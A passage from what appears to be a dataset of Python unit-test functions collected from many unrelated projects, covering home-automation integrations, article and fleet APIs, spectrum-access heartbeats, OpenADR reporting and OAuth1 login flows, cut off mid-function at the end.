\"/foo/bar\").end()\n s.request(\"1.2.3.4\", \"mozilla\", \"/foo/blah\").end()\n s.end()\n data = self.connector.transcription()\n assert len(data) == 2\n assert data[0].get('action') == \"session_start\"\n assert data[1].get('action') == \"session_end\"", "def test_run_workflow_by_payload(self):\n full_task_payload = {\n \"workflow_name\" : \"workflow_name\",\n \"input_mappings\" : \"input_mappings\"\n}\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = self.client.open(\n '/run/workflow/',\n method='POST',\n headers=headers,\n data=json.dumps(full_task_payload),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "async def test_create_vehicle_dispatch_route(client):\n create_dispatch_route_params = null\n params = [('access_token', 'access_token_example')]\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = await client.request(\n method='POST',\n path='/v1/fleet/vehicles/{vehicle_id}/dispatch/routes'.format(vehicle_id=56),\n headers=headers,\n json=create_dispatch_route_params,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "async def test_service_refresh_devices_trigger_no_state_update(\n hass: HomeAssistant, aioclient_mock: AiohttpClientMocker\n) -> None:\n data = {\n \"sensors\": {\n \"1\": {\n \"name\": \"Switch 1\",\n \"type\": \"ZHASwitch\",\n \"state\": {\"buttonevent\": 1000},\n \"config\": {\"battery\": 100},\n \"uniqueid\": \"00:00:00:00:00:00:00:01-00\",\n }\n }\n }\n with patch.dict(DECONZ_WEB_REQUEST, data):\n config_entry = await setup_deconz_integration(hass, aioclient_mock)\n\n assert len(hass.states.async_all()) == 1\n\n captured_events = async_capture_events(hass, CONF_DECONZ_EVENT)\n\n aioclient_mock.clear_requests()\n\n data = {\n \"config\": {},\n \"groups\": {\n \"1\": {\n \"id\": \"Group 1 id\",\n \"name\": \"Group 1 name\",\n \"type\": \"LightGroup\",\n \"state\": {},\n \"action\": {},\n \"scenes\": [{\"id\": \"1\", \"name\": \"Scene 1\"}],\n \"lights\": [\"1\"],\n }\n },\n \"lights\": {\n \"1\": {\n \"name\": \"Light 1 name\",\n \"state\": {\"reachable\": True},\n \"type\": \"Light\",\n \"uniqueid\": \"00:00:00:00:00:00:00:01-00\",\n }\n },\n \"sensors\": {\n \"1\": {\n \"name\": \"Switch 1\",\n \"type\": \"ZHASwitch\",\n \"state\": {\"buttonevent\": 1000},\n \"config\": {\"battery\": 100},\n \"uniqueid\": \"00:00:00:00:00:00:00:01-00\",\n }\n },\n }\n\n mock_deconz_request(aioclient_mock, config_entry.data, data)\n\n await hass.services.async_call(\n DECONZ_DOMAIN, SERVICE_DEVICE_REFRESH, service_data={CONF_BRIDGE_ID: BRIDGEID}\n )\n await hass.async_block_till_done()\n\n assert len(hass.states.async_all()) == 5\n assert len(captured_events) == 0", "def test_06_test_via_endpoint(self):\n\n # set up all the bits we need\n dataset = []\n for i in range(10):\n data = ArticleFixtureFactory.make_incoming_api_article(doi=\"10.123/test/\" + str(i),\n fulltext=\"http://example.com/\" + str(i))\n dataset.append(data)\n\n # create the main account we're going to work as\n article_owner = models.Account()\n article_owner.set_id(\"test\")\n article_owner.set_name(\"Tester\")\n article_owner.set_email(\"[email protected]\")\n article_owner.generate_api_key()\n article_owner.add_role('publisher')\n article_owner.add_role('api')\n article_owner.save(blocking=True)\n\n # Add another user who doesn't own these articles\n somebody_else = models.Account()\n somebody_else.set_id(\"somebody_else\")\n somebody_else.set_name(\"Somebody Else\")\n somebody_else.set_email(\"[email protected]\")\n somebody_else.generate_api_key()\n somebody_else.add_role('publisher')\n somebody_else.add_role('api')\n somebody_else.save(blocking=True)\n\n assert article_owner.api_key != somebody_else.api_key\n\n # add a journal to the article owner account to create that link between account and articles\n journal = models.Journal(**JournalFixtureFactory.make_journal_source(in_doaj=True))\n journal.set_owner(article_owner.id)\n journal.save(blocking=True)\n\n with self.app_test.test_request_context():\n with self.app_test.test_client() as t_client:\n\n # Bulk create\n # The wrong owner can't create articles\n resp = t_client.post(url_for('api_v3.bulk_article_create', api_key=somebody_else.api_key),\n data=json.dumps(dataset))\n assert resp.status_code == 400, resp.status_code\n\n # Bulk create\n # redirected from v1\n # resp = t_client.post(url_for('api_v1.bulk_article_create', api_key=somebody_else.api_key),\n # data=json.dumps(dataset))\n # assert resp.status_code == 301, resp.status_code\n\n # But the correct owner can create articles\n resp = t_client.post(url_for('api_v3.bulk_article_create', api_key=article_owner.api_key),\n data=json.dumps(dataset))\n assert resp.status_code == 201\n reply = json.loads(resp.data.decode(\"utf-8\"))\n assert len(reply) == len(dataset)\n first_art = reply.pop()\n assert first_art['status'] == 'created'\n # Check we actually created new records\n time.sleep(1)\n assert len(models.Article.all()) == len(dataset)\n\n # Bulk delete\n all_but_one = [new_art['id'] for new_art in reply]\n resp = t_client.delete(url_for('api_v3.bulk_article_delete', api_key=article_owner.api_key),\n data=json.dumps(all_but_one))\n assert resp.status_code == 204\n time.sleep(1)\n # we should have deleted all but one of the articles.\n assert len(models.Article.all()) == 1\n # And our other user isn't allowed to delete the remaining one.\n resp = t_client.delete(url_for('api_v3.bulk_article_delete', api_key=somebody_else.api_key),\n data=json.dumps([first_art['id']]))\n assert resp.status_code == 400", "def test_list(self):\n response = self.client.get('/routines/')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.data['count'], 2)\n self.assertEqual(len(response.data['results']), 2)\n self.assertEqual(response.data['results'][0]['id'], self.rout1.id)", "def test_services(self):\n\n # Test turn_on\n turn_on_calls = mock_service(\n self.hass, remote.DOMAIN, SERVICE_TURN_ON)\n\n remote.turn_on(\n self.hass,\n entity_id='entity_id_val')\n\n self.hass.block_till_done()\n\n self.assertEqual(1, len(turn_on_calls))\n call = turn_on_calls[-1]\n\n self.assertEqual(remote.DOMAIN, call.domain)\n\n # Test turn_off\n turn_off_calls = mock_service(\n self.hass, remote.DOMAIN, SERVICE_TURN_OFF)\n\n remote.turn_off(\n self.hass, entity_id='entity_id_val')\n\n self.hass.block_till_done()\n\n self.assertEqual(1, len(turn_off_calls))\n call = turn_off_calls[-1]\n\n self.assertEqual(remote.DOMAIN, call.domain)\n self.assertEqual(SERVICE_TURN_OFF, call.service)\n self.assertEqual('entity_id_val', call.data[ATTR_ENTITY_ID])\n\n # Test sync\n sync_calls = mock_service(\n self.hass, remote.DOMAIN, SERVICE_SYNC)\n\n remote.sync(\n self.hass, entity_id='entity_id_val')\n\n self.hass.block_till_done()\n\n self.assertEqual(1, len(sync_calls))\n call = sync_calls[-1]\n\n self.assertEqual(remote.DOMAIN, call.domain)\n self.assertEqual(SERVICE_SYNC, call.service)\n self.assertEqual('entity_id_val', call.data[ATTR_ENTITY_ID])\n\n # Test send_command\n send_command_calls = mock_service(\n self.hass, remote.DOMAIN, SERVICE_SEND_COMMAND)\n\n remote.send_command(\n self.hass, entity_id='entity_id_val',\n device='test_device', command='test_command')\n\n self.hass.block_till_done()\n\n self.assertEqual(1, len(send_command_calls))\n call = send_command_calls[-1]\n\n self.assertEqual(remote.DOMAIN, call.domain)\n self.assertEqual(SERVICE_SEND_COMMAND, call.service)\n self.assertEqual('entity_id_val', call.data[ATTR_ENTITY_ID])", "def test_get_post_endpoints(self):\n self.addcontribgetrequest = self.factory.get(\n reverse(\"add_album_contrib\", kwargs={\"albumid\": self.testalbum.id}))\n self.addcontribgetrequest.user = self.u\n self.updateaccessgetrequest = self.factory.get(\n reverse(\"update_album_access\", kwargs={\"id\": self.testalbum.id}))\n self.updateaccessgetrequest.user = self.u\n self.addgroupgetrequest = self.factory.get(reverse(\"add_album_groups\", kwargs={\"albumid\":self.testalbum.id}))\n self.addgroupgetrequest.user = self.u\n\n self.assertRaises(Http404, album.add_contrib, self.addcontribgetrequest, self.testalbum.id)\n self.assertRaises(Http404, album.update_access_type, self.updateaccessgetrequest, self.testalbum.id)\n self.assertRaises(Http404, album.add_groups, self.addgroupgetrequest, self.testalbum.id)\n # todo: maybe make this a loop", "def test_run_add_group():\n gid = 123\n azure = create_azure_mock('GROUP1', [1, 2])\n data = [create_everbridge_contacts([], True)]\n insert_ids = [1, 2]\n insert_data = create_everbridge_contacts(insert_ids, False)\n inserted_data = [create_everbridge_contacts(insert_ids, True)]\n inserted_exids = ('&[email protected]&[email protected]')\n ever = create_everbridge_mock(data)\n ever.add_group = MagicMock(return_value={'id': 123})\n ever.get_group_id_by_name = MagicMock(return_value=None)\n ever.get_contacts_by_external_ids = MagicMock(side_effect=inserted_data)\n app = Synchronizer(azure, ever)\n # Call run\n rslt = app.run([gid])\n # Tests each method call\n azure.get_group_name.assert_called_with(gid)\n ever.get_group_id_by_name.assert_called_with('GROUP1')\n ever.add_group.assert_called_with('GROUP1', None)\n ever.delete_group.assert_not_called()\n ever.delete_members_from_group.assert_not_called()\n ever.delete_contacts.assert_not_called()\n ever.upsert_contacts.assert_called_with(insert_data)\n ever.get_contacts_by_external_ids.assert_called_with(inserted_exids)\n ever.add_members_to_group.assert_called_with(gid, insert_ids)\n assert rslt == {\n 'GROUP1': {\n 'azure_group_id': 123, 'everbridge_group_id': 123,\n 'azure_count': 2, 'everbridge_count': 0, 'error_contacts': 0,\n 'inserted_contacts': 2, 'updated_contacts': 0, 'removed_members': 0,\n 'deleted_contacts': 0, 'added_members': 2}\n }", "async def test_get_fleet_locations(client):\n group_param = {}\n params = [('access_token', 'access_token_example')]\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = await client.request(\n method='POST',\n path='/v1/fleet/locations',\n headers=headers,\n json=group_param,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "async def test_device_registry_calls(opp):\n dev_reg = async_get(opp)\n supervisor_mock_data = {\n \"addons\": [\n {\n \"name\": \"test\",\n \"slug\": \"test\",\n \"installed\": True,\n \"update_available\": False,\n \"version\": \"1.0.0\",\n \"version_latest\": \"1.0.0\",\n \"repository\": \"test\",\n \"url\": \"https://github.com/openpeerpower/addons/test\",\n },\n {\n \"name\": \"test2\",\n \"slug\": \"test2\",\n \"installed\": True,\n \"update_available\": False,\n \"version\": \"1.0.0\",\n \"version_latest\": \"1.0.0\",\n \"url\": \"https://github.com\",\n },\n ]\n }\n os_mock_data = {\n \"board\": \"odroid-n2\",\n \"boot\": \"A\",\n \"update_available\": False,\n \"version\": \"5.12\",\n \"version_latest\": \"5.12\",\n }\n\n with patch.dict(os.environ, MOCK_ENVIRON), patch(\n \"openpeerpower.components.oppio.OppIO.get_supervisor_info\",\n return_value=supervisor_mock_data,\n ), patch(\n \"openpeerpower.components.oppio.OppIO.get_os_info\",\n return_value=os_mock_data,\n ):\n config_entry = MockConfigEntry(domain=DOMAIN, data={}, unique_id=DOMAIN)\n config_entry.add_to_opp(opp)\n assert await opp.config_entries.async_setup(config_entry.entry_id)\n await opp.async_block_till_done()\n assert len(dev_reg.devices) == 3\n\n supervisor_mock_data = {\n \"addons\": [\n {\n \"name\": \"test2\",\n \"slug\": \"test2\",\n \"installed\": True,\n \"update_available\": False,\n \"version\": \"1.0.0\",\n \"version_latest\": \"1.0.0\",\n \"url\": \"https://github.com\",\n },\n ]\n }\n\n # Test that when addon is removed, next update will remove the add-on and subsequent updates won't\n with patch(\n \"openpeerpower.components.oppio.OppIO.get_supervisor_info\",\n return_value=supervisor_mock_data,\n ), patch(\n \"openpeerpower.components.oppio.OppIO.get_os_info\",\n return_value=os_mock_data,\n ):\n async_fire_time_changed(opp, dt_util.now() + timedelta(hours=1))\n await opp.async_block_till_done()\n assert len(dev_reg.devices) == 2\n\n async_fire_time_changed(opp, dt_util.now() + timedelta(hours=2))\n await opp.async_block_till_done()\n assert len(dev_reg.devices) == 2\n\n supervisor_mock_data = {\n \"addons\": [\n {\n \"name\": \"test2\",\n \"slug\": \"test2\",\n \"installed\": True,\n \"update_available\": False,\n \"version\": \"1.0.0\",\n \"version_latest\": \"1.0.0\",\n \"url\": \"https://github.com\",\n },\n {\n \"name\": \"test3\",\n \"slug\": \"test3\",\n \"installed\": True,\n \"update_available\": False,\n \"version\": \"1.0.0\",\n \"version_latest\": \"1.0.0\",\n \"url\": \"https://github.com\",\n },\n ]\n }\n\n # Test that when addon is added, next update will reload the entry so we register\n # a new device\n with patch(\n \"openpeerpower.components.oppio.OppIO.get_supervisor_info\",\n return_value=supervisor_mock_data,\n ), patch(\n \"openpeerpower.components.oppio.OppIO.get_os_info\",\n return_value=os_mock_data,\n ):\n async_fire_time_changed(opp, dt_util.now() + timedelta(hours=3))\n await opp.async_block_till_done()\n assert len(dev_reg.devices) == 3", "def test_get_route_instance_entry(self, mock_execute_cli_command_on_device):\n mock_device_ins = mock.Mock()\n\n print(\"Get master instance info from HA topo\")\n mock_execute_cli_command_on_device.return_value = self.response[\"HA_SINGLE_INSTANCE\"]\n response = self.ins.get_route_instance_entry(device=mock_device_ins, name=\"master\")\n print(self.tool.pprint(response))\n self.assertIsInstance(response, (list, tuple))\n self.assertEqual(len(response), 2)\n\n print(\"Get all instance info from HA topo\")\n mock_execute_cli_command_on_device.return_value = self.response[\"HA_MULTI_INSTANCE\"]\n response = self.ins.get_route_instance_entry(device=mock_device_ins)\n print(self.tool.pprint(response))\n self.assertIsInstance(response, (list, tuple))\n self.assertEqual(len(response), 8)\n self.assertEqual(int(response[5][\"instance_rib_irib_active_count\"]), 2)\n\n print(\"Get brief all instance info from HA topo\")\n mock_execute_cli_command_on_device.return_value = self.response[\"HA_SINGLE_INSTANCE_BRIEF\"]\n response = self.ins.get_route_instance_entry(device=mock_device_ins)\n print(self.tool.pprint(response))\n self.assertIsInstance(response, (list, tuple))\n self.assertEqual(len(response), 2)\n self.assertEqual(int(response[0][\"instance_rib_irib_active_count\"]), 18)\n\n print(\"Get detail all instance info from HA topo\")\n mock_execute_cli_command_on_device.return_value = self.response[\"HA_SINGLE_INSTANCE_DETAIL\"]\n response = self.ins.get_route_instance_entry(device=mock_device_ins)\n print(self.tool.pprint(response))\n self.assertIsInstance(response, (list, tuple))\n self.assertEqual(len(response), 2)\n self.assertEqual(response[0][\"router_id\"], \"10.208.133.147\")\n\n print(\"Get extensive all instance info from HA topo\")\n mock_execute_cli_command_on_device.return_value = self.response[\"HA_SINGLE_INSTANCE_EXTENSIVE\"]\n response = self.ins.get_route_instance_entry(device=mock_device_ins)\n print(self.tool.pprint(response))\n self.assertIsInstance(response, (list, tuple))\n self.assertEqual(len(response), 18)\n self.assertEqual(response[17][\"instance_rib_irib_name\"], \"inet6color.0\")\n\n print(\"Get summary all instance info from HA topo\")\n mock_execute_cli_command_on_device.return_value = self.response[\"HA_SINGLE_INSTANCE_SUMMARY\"]\n response = self.ins.get_route_instance_entry(device=mock_device_ins)\n print(self.tool.pprint(response))\n self.assertIsInstance(response, (list, tuple))\n self.assertGreaterEqual(len(response), 1)\n\n print(\"Get route instance info by text and more options\")\n mock_execute_cli_command_on_device.return_value = self.response[\"SA_INSTANCE_TEXT\"]\n response = self.ins.get_route_instance_entry(device=mock_device_ins, return_mode=\"text\", more_options=\"summary\")\n print(self.tool.pprint(response))\n self.assertIsInstance(response, str)\n self.assertRegex(response, r\"__juniper_private1__.inet.0\")\n\n print(\"Invalid return_mode value\")\n mock_execute_cli_command_on_device.return_value = self.response[\"HA_SINGLE_INSTANCE_SUMMARY\"]\n self.assertRaisesRegex(\n ValueError,\n r\"'return_mode' must be 'ENTRY_LIST' or 'TEXT'\",\n self.ins.get_route_instance_entry,\n device=mock_device_ins, return_mode=\"Unknown\",\n )\n\n print(\"Cannot get response from device\")\n mock_execute_cli_command_on_device.return_value = False\n response = self.ins.get_route_instance_entry(device=mock_device_ins, more_options=\"summary\")\n self.assertFalse(response)", "def test_api_new_game(self):\n\n with self.client as client:\n ...\n # write a test for this route", "async def test_update_reports():\n # Create a server\n logger = logging.getLogger('openleadr')\n logger.setLevel(logging.DEBUG)\n loop = asyncio.get_event_loop()\n server = OpenADRServer(vtn_id='testvtn')\n\n register_report_future_1 = loop.create_future()\n register_report_future_2 = loop.create_future()\n register_report_futures = [register_report_future_1, register_report_future_2]\n\n receive_report_future_1 = loop.create_future()\n receive_report_future_2 = loop.create_future()\n receive_report_future_3 = loop.create_future()\n receive_report_future_4 = loop.create_future()\n receive_report_futures = [receive_report_future_1, receive_report_future_2, receive_report_future_3, receive_report_future_4]\n server.add_handler('on_register_report', partial(on_register_report, futures=register_report_futures, receive_futures=receive_report_futures))\n\n party_future = loop.create_future()\n server.add_handler('on_create_party_registration', partial(on_create_party_registration, future=party_future))\n\n # Create a client\n client = OpenADRClient(ven_name='myven', vtn_url='http://localhost:8080/OpenADR2/Simple/2.0b')\n\n # Add 4 reports\n future_1 = loop.create_future()\n client.add_report(callback=partial(collect_data, future=future_1),\n report_specifier_id='PowerReport',\n resource_id='Device001',\n measurement='power_real',\n sampling_rate=timedelta(seconds=2),\n unit='W')\n future_2 = loop.create_future()\n client.add_report(callback=partial(collect_data, future=future_2),\n report_specifier_id='PowerReport',\n resource_id='Device002',\n measurement='power_real',\n sampling_rate=timedelta(seconds=2),\n unit='W')\n future_3 = loop.create_future()\n client.add_report(callback=partial(collect_data, future=future_3),\n report_specifier_id='VoltageReport',\n resource_id='Device001',\n measurement='voltage',\n sampling_rate=timedelta(seconds=2),\n unit='V')\n future_4 = loop.create_future()\n client.add_report(callback=partial(collect_data, future=future_4),\n report_specifier_id='VoltageReport',\n resource_id='Device002',\n measurement='voltage',\n sampling_rate=timedelta(seconds=2),\n unit='V')\n\n assert len(client.reports) == 2\n asyncio.create_task(server.run_async())\n # await asyncio.sleep(1)\n\n # Run the client asynchronously\n print(\"Running the client\")\n asyncio.create_task(client.run())\n\n print(\"Awaiting party future\")\n await party_future\n\n print(\"Awaiting report futures\")\n await asyncio.gather(register_report_future_1, register_report_future_2)\n await asyncio.sleep(0.1)\n assert len(server.services['report_service'].report_callbacks) == 4\n\n print(\"Awaiting data collection futures\")\n await future_1\n await future_2\n await future_3\n await future_4\n\n print(\"Awaiting update report futures\")\n await asyncio.gather(receive_report_future_1, receive_report_future_2, receive_report_future_3, receive_report_future_4)\n print(\"Done gathering\")\n\n assert receive_report_future_1.result()[0][1] == future_1.result()\n assert receive_report_future_2.result()[0][1] == future_2.result()\n assert receive_report_future_3.result()[0][1] == future_3.result()\n assert receive_report_future_4.result()[0][1] == future_4.result()\n\n await client.stop()\n await server.stop()", "def testListEndpoints(self):\n # Register an exporter\n context = self.framework.get_bundle_context()\n exporter = Exporter(context)\n context.register_service(pelix.remote.SERVICE_EXPORT_PROVIDER,\n exporter, {})\n\n # Empty list\n status, response = self._http_get(\"/endpoints\")\n\n # Check result\n self.assertEqual(status, 200)\n self.assertListEqual(json.loads(response), [])\n\n # Register some endpoints\n svc_regs = []\n for _ in range(3):\n # Register a service\n svc_regs.append(\n context.register_service(\n \"sample.spec\", object(),\n {pelix.remote.PROP_EXPORTED_INTERFACES: \"*\"}))\n\n # Request the list of endpoints\n status, response = self._http_get(\"/endpoints\")\n\n # Check result\n self.assertEqual(status, 200)\n\n # Get all endpoints ID\n data = json.loads(response)\n local_uids = [endpoint.uid for endpoint in exporter.endpoints]\n servlet_uids = [item['uid'] for item in data]\n\n self.assertCountEqual(servlet_uids, local_uids)\n\n # Unregister them\n for svc_reg in svc_regs:\n # Unregister the service\n svc_reg.unregister()\n\n # Request the list of endpoints\n status, response = self._http_get(\"/endpoints\")\n\n # Check result\n self.assertEqual(status, 200)\n\n # Get all endpoints ID\n data = json.loads(response)\n local_uids = [endpoint.uid for endpoint in exporter.endpoints]\n servlet_uids = [item['uid'] for item in data]\n\n self.assertCountEqual(servlet_uids, local_uids)", "async def test_form_multiple_services(hass: HomeAssistant) -> None:\n result = await hass.config_entries.flow.async_init(\n DOMAIN, context={\"source\": config_entries.SOURCE_USER}\n )\n assert result[\"type\"] == RESULT_TYPE_FORM\n assert result[\"errors\"] is None\n\n with patch(\"aussiebb.asyncio.AussieBB.__init__\", return_value=None), patch(\n \"aussiebb.asyncio.AussieBB.login\", return_value=True\n ), patch(\"aussiebb.asyncio.AussieBB.get_services\", return_value=FAKE_SERVICES):\n result2 = await hass.config_entries.flow.async_configure(\n result[\"flow_id\"],\n FAKE_DATA,\n )\n await hass.async_block_till_done()\n\n assert result2[\"type\"] == RESULT_TYPE_FORM\n assert result2[\"step_id\"] == \"service\"\n assert result2[\"errors\"] is None\n\n with patch(\n \"homeassistant.components.aussie_broadband.async_setup_entry\",\n return_value=True,\n ) as mock_setup_entry:\n result3 = await hass.config_entries.flow.async_configure(\n result[\"flow_id\"],\n {CONF_SERVICES: [FAKE_SERVICES[1][\"service_id\"]]},\n )\n await hass.async_block_till_done()\n\n assert result3[\"type\"] == RESULT_TYPE_CREATE_ENTRY\n assert result3[\"title\"] == TEST_USERNAME\n assert result3[\"data\"] == FAKE_DATA\n assert result3[\"options\"] == {\n CONF_SERVICES: [FAKE_SERVICES[1][\"service_id\"]],\n }\n assert len(mock_setup_entry.mock_calls) == 1", "def test_10_9_4_1_1_1(self):\n\n # Register the device\n device_a = json.load(\n open(os.path.join('testcases', 'testdata', 'device_a.json')))\n self._sas_admin.InjectFccId({'fccId': device_a['fccId']})\n request = {'registrationRequest': [device_a]}\n response = self._sas.Registration(request)['registrationResponse'][0]\n # Check registration response\n self.assertEqual(response['response']['responseCode'], 0)\n cbsd_id = response['cbsdId']\n del request, response\n\n # Request grant\n grant_0 = json.load(\n open(os.path.join('testcases', 'testdata', 'grant_0.json')))\n grant_0['cbsdId'] = cbsd_id\n request = {'grantRequest': [grant_0]}\n # Check grant response\n response = self._sas.Grant(request)['grantResponse'][0]\n self.assertEqual(response['cbsdId'], cbsd_id)\n self.assertTrue(response['grantId'])\n self.assertEqual(response['response']['responseCode'], 0)\n grant_id = response['grantId']\n del request, response\n\n # Heartbeat\n request = {\n 'heartbeatRequest': [{\n 'cbsdId': cbsd_id,\n 'grantId': grant_id,\n 'operationState': 'GRANTED'\n }]\n }\n response = self._sas.Heartbeat(request)['heartbeatResponse'][0]\n # Check the heartbeat response\n self.assertEqual(response['cbsdId'], cbsd_id)\n self.assertEqual(response['grantId'], grant_id)\n self.assertLess(datetime.utcnow(),\n datetime.strptime(response['transmitExpireTime'],\n '%Y-%m-%dT%H:%M:%SZ'))\n self.assertEqual(response['response']['responseCode'], 0)", "def test_timetracking_resource_methods(self, mock_url, resource_name, single_name):\n business_id = 1234\n resource_id = 2345\n resource_ = getattr(self.freshBooksClient, resource_name)\n\n list_response = {resource_name: [], \"meta\": {\"page\": 1, \"pages\": 0, \"per_page\": 15, \"total\": 0}}\n single_response = {single_name: {}}\n\n with patch.object(TimetrackingResource, \"_request\", return_value=list_response) as mock_request:\n resource_.list(business_id)\n mock_request.assert_called_with(\"some_url\", HttpVerbs.GET)\n\n with patch.object(TimetrackingResource, \"_request\", return_value=single_response) as mock_request:\n resource_.get(business_id, resource_id)\n mock_request.assert_called_with(\"some_url\", HttpVerbs.GET)\n\n resource_.create(business_id, {})\n mock_request.assert_called_with(\"some_url\", HttpVerbs.POST, data={single_name: {}})\n\n resource_.update(business_id, resource_id, {})\n mock_request.assert_called_with(\"some_url\", HttpVerbs.PUT, data={single_name: {}})\n\n resource_.delete(business_id, resource_id)\n mock_request.assert_called_with(\"some_url\", HttpVerbs.DELETE)", "def test_10_9_4_2_3_1_3(self):\n\n # Register the device\n device_a = json.load(\n open(os.path.join('testcases', 'testdata', 'device_a.json')))\n self._sas_admin.InjectFccId({'fccId': device_a['fccId']})\n request = {'registrationRequest': [device_a]}\n response = self._sas.Registration(request)['registrationResponse'][0]\n # Check registration response\n self.assertEqual(response['response']['responseCode'], 0)\n cbsd_id = response['cbsdId']\n del request, response\n\n # Request grant\n grant_0 = json.load(\n open(os.path.join('testcases', 'testdata', 'grant_0.json')))\n grant_0['cbsdId'] = cbsd_id\n request = {'grantRequest': [grant_0]}\n # Check grant response\n response = self._sas.Grant(request)['grantResponse'][0]\n self.assertEqual(response['cbsdId'], cbsd_id)\n self.assertTrue(response['grantId'])\n self.assertEqual(response['response']['responseCode'], 0)\n grant_id = response['grantId']\n del request, response\n\n # First successful Heartbeat\n request = {\n 'heartbeatRequest': [{\n 'cbsdId': cbsd_id,\n 'grantId': grant_id,\n 'operationState': 'GRANTED'\n }]\n }\n response = self._sas.Heartbeat(request)['heartbeatResponse'][0]\n # Check the heartbeat response\n self.assertEqual(response['cbsdId'], cbsd_id)\n self.assertEqual(response['grantId'], grant_id)\n self.assertLess(datetime.utcnow(),\n datetime.strptime(response['transmitExpireTime'],\n '%Y-%m-%dT%H:%M:%SZ'))\n self.assertEqual(response['response']['responseCode'], 0)\n del request, response\n\n # operationState is missing\n request = {\n 'heartbeatRequest': [{\n 'cbsdId': cbsd_id,\n 'grantId': grant_id\n }]\n }\n response = self._sas.Heartbeat(request)['heartbeatResponse'][0]\n # Check the heartbeat response\n self.assertEqual(response['response']['responseCode'], 102)", "def test_valid_flow__registration(self):\n\n test_env = {\n \"testapp_authority\": self.testapp_authority,\n \"testapp_app\": self.testapp_app,\n \"extra_environ_app\": {\n \"wsgi.url_scheme\": \"https\",\n \"HTTP_HOST\": \"app.example.com\",\n },\n \"extra_environ_authority\": {\n \"wsgi.url_scheme\": \"https\",\n \"HTTP_HOST\": \"authority.example.com\",\n },\n \"requests_session_app\": requests.Session(),\n \"requests_session_authority\": requests.Session(),\n }\n\n def callback__request_token(req, test_env=test_env):\n \"\"\"/authority/oauth1/request_token is visited by the Server\n\n py3 needs the 'unicode' wrapper to decode the bystring\n \"\"\"\n assert \"Authorization\" in req.headers\n assert req.headers[\"Authorization\"].decode(\"utf-8\").startswith(\"OAuth \")\n assert \"User-Agent\" in req.headers\n assert req.headers[\"User-Agent\"].decode(\"utf-8\") == \"CustomApiClient v0\"\n assert req.url == oauth1_utils.CustomApiClient.OAUTH1_SERVER_REQUEST_TOKEN\n\n # request as SERVER, no cookies\n with IsolatedTestapp(test_env[\"testapp_authority\"]) as testapp:\n res = testapp.get(\n \"/authority/oauth1/request_token\",\n headers=req.headers,\n extra_environ=test_env[\"extra_environ_authority\"],\n status=200,\n )\n\n # status is '200 OK'\n # return in a format tailored for `requests`\n return (int(res.status.split(\" \")[0]), res.headers, res.body)\n\n def callback__authenticate_get(req, test_env=test_env):\n \"\"\"/authority/oauth1/authorize is visited by the USER\"\"\"\n assert req.url.startswith(OAUTH1__URL_AUTHORITY_AUTHENTICATE)\n qs = req.url.split(\"?\")[1]\n qs = dict(parse_qsl(qs))\n\n testapp = test_env[\"testapp_authority\"]\n res = testapp.get(\n \"/authority/oauth1/authorize?oauth_token=%s\" % qs[\"oauth_token\"],\n headers=req.headers,\n extra_environ=test_env[\"extra_environ_authority\"],\n status=200,\n )\n test_env[\"requests_session_authority\"].cookies.update(\n testapp.cookies\n ) # update the session with the cookies from the response\n\n # status is '200 OK'\n # return in a format tailored for `requests`\n return (int(res.status.split(\" \")[0]), res.headers, res.body)\n\n def callback__authenticate_post(req, test_env=test_env):\n \"\"\"/authority/oauth1/authorize is visited by the USER\"\"\"\n assert req.url.startswith(OAUTH1__URL_AUTHORITY_AUTHENTICATE)\n payload = dict(parse_qsl(req.body))\n\n testapp = test_env[\"testapp_authority\"]\n res = testapp.post(\n \"/authority/oauth1/authorize\",\n payload,\n headers=req.headers,\n extra_environ=test_env[\"extra_environ_authority\"],\n status=302,\n )\n test_env[\"requests_session_authority\"].cookies.update(\n testapp.cookies\n ) # update the session with the cookies from the response\n\n # status is '200 OK'\n # return in a format tailored for `requests`\n return (int(res.status.split(\" \")[0]), res.headers, res.body)\n\n def callback__callback(req, test_env=test_env):\n \"\"\"/application/flow-register/authorized-callback is visited by the USER\"\"\"\n _path, _qs = req.url.split(\"?\")\n\n testapp = test_env[\"testapp_app\"]\n res = testapp.get(\n \"/application/flow-register/authorized-callback?%s\" % _qs,\n headers=req.headers,\n extra_environ=test_env[\"extra_environ_app\"],\n status=303,\n )\n test_env[\"requests_session_app\"].cookies.update(\n testapp.cookies\n ) # update the session with the cookies from the response\n\n # status is '303 See Other'\n # return in a format tailored for `requests`\n return (int(res.status.split(\" \")[0]), res.headers, res.body)\n\n def callback__access_token(req, test_env=test_env):\n \"\"\"/authority/oauth1/access_token is visited by the Server\"\"\"\n assert \"Authorization\" in req.headers\n assert req.headers[\"Authorization\"].decode(\"utf-8\").startswith(\"OAuth \")\n assert \"User-Agent\" in req.headers\n assert req.headers[\"User-Agent\"].decode(\"utf-8\") == \"CustomApiClient v0\"\n assert req.url == oauth1_utils.CustomApiClient.OAUTH1_SERVER_ACCESS_TOKEN\n\n # request as SERVER, no cookies\n with IsolatedTestapp(test_env[\"testapp_authority\"]) as testapp:\n _headers = string_headers(\n req.headers\n ) # these can end up being unicode in tests\n res = testapp.get(\n \"/authority/oauth1/access_token\",\n headers=_headers,\n extra_environ=test_env[\"extra_environ_authority\"],\n status=200,\n )\n\n # status is '200 OK'\n # return in a format tailored for `requests`\n return (int(res.status.split(\" \")[0]), res.headers, res.body)\n\n def callback__callback_success(req, test_env=test_env):\n \"\"\"/application/flow-register/authorized-callback-success is visited by the USER\"\"\"\n (_path, _qs) = parse_request_simple(req)\n\n testapp = test_env[\"testapp_application\"]\n _headers = string_headers(\n req.headers\n ) # these can end up being unicode in tests\n res = testapp.get(\n \"/application/flow-register/authorized-callback-success?%s\" % _qs,\n headers=_headers,\n extra_environ=test_env[\"extra_environ_app\"],\n status=200,\n )\n test_env[\"requests_session_application\"].cookies.update(\n testapp.cookies\n ) # update the session with the cookies from the response\n\n # status is '200 OK'\n # return in a format tailored for `requests`\n return (int(res.status.split(\" \")[0]), res.headers, res.body)\n\n with responses.RequestsMock() as rsps:\n rsps.add_callback(\n 